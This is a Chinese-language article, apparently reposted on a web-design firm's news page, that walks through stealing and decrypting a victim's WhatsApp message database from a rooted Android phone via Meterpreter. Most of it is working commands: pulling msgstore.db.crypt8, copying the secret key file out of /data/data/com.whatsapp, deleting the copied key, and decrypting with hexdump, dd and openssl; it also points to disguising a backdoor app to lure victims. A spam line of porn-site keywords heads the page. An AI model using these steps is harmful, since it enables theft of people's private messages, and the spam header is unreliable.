日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫

針對已root過的安卓移動設(shè)備,本文主要講解遠程攻擊并解密WhatsApp數(shù)據(jù)庫的詳細過程。另外,這再一次提醒我們,對移動設(shè)備進行root(安卓)或越獄(iOS),將使用戶暴露在黑客攻擊之下。

網(wǎng)站的建設(shè)創(chuàng)新互聯(lián)專注網(wǎng)站定制,經(jīng)驗豐富,不做模板,主營網(wǎng)站定制開發(fā).小程序定制開發(fā),H5頁面制作!給你煥然一新的設(shè)計體驗!已為假山制作等企業(yè)提供專業(yè)服務(wù)。

幾小時前,網(wǎng)絡(luò)上發(fā)布了一個有趣的文章《如何遠程破解并解密WhatsApp數(shù)據(jù)庫[ROOT] 》,文中解釋了如何從一個root過的安卓系統(tǒng)中提取并解密WhatsApp數(shù)據(jù)庫。盡管通常情況下WhatsApp非常安全,但對安卓設(shè)備的root處理將可能使用戶暴露在攻擊風(fēng)險之中。

接下來,就讓我們一步一步看看作者(使用匿名F.E.A.R.)所提出的攻擊場景。

步驟1:利用并獲取安卓設(shè)備的訪問權(quán)限

正如這篇指南中所解釋的,如果安卓設(shè)備通過使用Meterpeter命令進行了root,那么這一階段將變得很簡單。

為了攻擊并解密WhatsApp數(shù)據(jù)庫,攻擊者需要一個存在于數(shù)據(jù)文件夾中的密鑰文件,而訪問該文件的唯一途徑就是擁有root權(quán)限。此外,該密鑰文件是解密WhatsApp數(shù)據(jù)庫所必不可少的。

步驟2:下載數(shù)據(jù)庫

使用下列命令通過Meterpreter下載數(shù)據(jù)庫:

cd /
cd /sdcard/WhatsApp
ls (打印當(dāng)前目錄)
cd Databases

下載msgstore.db.crypt8 (這里需要耗費一些時間,可能很長)

步驟3:提取解密密鑰

解密WhatsApp數(shù)據(jù)庫所必需的密鑰文件中存儲了兩套解密密鑰,即實際的加密密鑰K和一個名為IV的初始化向量。值得一提的是,WhatsApp密鑰文件存儲在一個安全的位置。下面這些都是提取密鑰文件的命令:

shell
su(超級用戶訪問或僅僅進行提權(quán))

正如F.E.A.R.所解釋的,這是最困難的部分,特別是如果目標(biāo)手機用戶是有經(jīng)驗且熟練的用戶,因為他必須已經(jīng)安裝SuperSU應(yīng)用程序。

如何誘導(dǎo)受害者安裝SuperSU?

可以看一下用戶bart發(fā)布的這篇教程,里面解釋了如何偽裝一個后門應(yīng)用程序。不過,如果下列場景中的受害者并非是一個有經(jīng)驗的或熟練的用戶,那么事情將變得更加簡單:

1、他們沒有安裝SuperSU應(yīng)用程序。

2、對于新安裝的應(yīng)用,他們沒有改變設(shè)置為PROMPT,而并非GRANT。

執(zhí)行以下命令來訪問密鑰文件夾,并提取解密密鑰。

cd /
cd /data/data
ls
cd com.whatsapp ls
cd files
ls cp key /sdcard/Download (意思是將文件key拷貝到/sdcard/Download文件夾)

步驟4:下載解密密鑰文件到root目錄

下載提取的密鑰文件到root目錄,該目錄中還含有加密的WhatsApp數(shù)據(jù)庫:

cd /
cd /sdcard/Download
download key
rm key (確保你刪除了key文件)

步驟5:解密WhatsApp數(shù)據(jù)庫

文章中報道了2種不同的方法來解密WhatsApp:

(1)使用Linux命令:每次復(fù)制并粘貼一條命令,不要將它們寫成一個腳本文件,否則它將不能正常工作:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
gzip -cdq msgstore.gz > msgstore.db

如果第4行命令不能工作,那么就按下面的指令操作:

hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316
hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K (從第1條指令中粘貼文本文檔) -iv (從第2條指令中粘貼文本文檔) > msgstore.gz

(2)第二種方法基于簡單的Windows WhatsApp查看器應(yīng)用程序,可以看一下原文。

這是又一次的教訓(xùn),對移動設(shè)備進行root(安卓)或越獄(iOS),將使用戶暴露在黑客攻擊之下。


分享文章:攻擊者是如何一步步拿下你的WhatsApp數(shù)據(jù)庫
轉(zhuǎn)載源于:http://www.dlmjj.cn/article/cojojge.html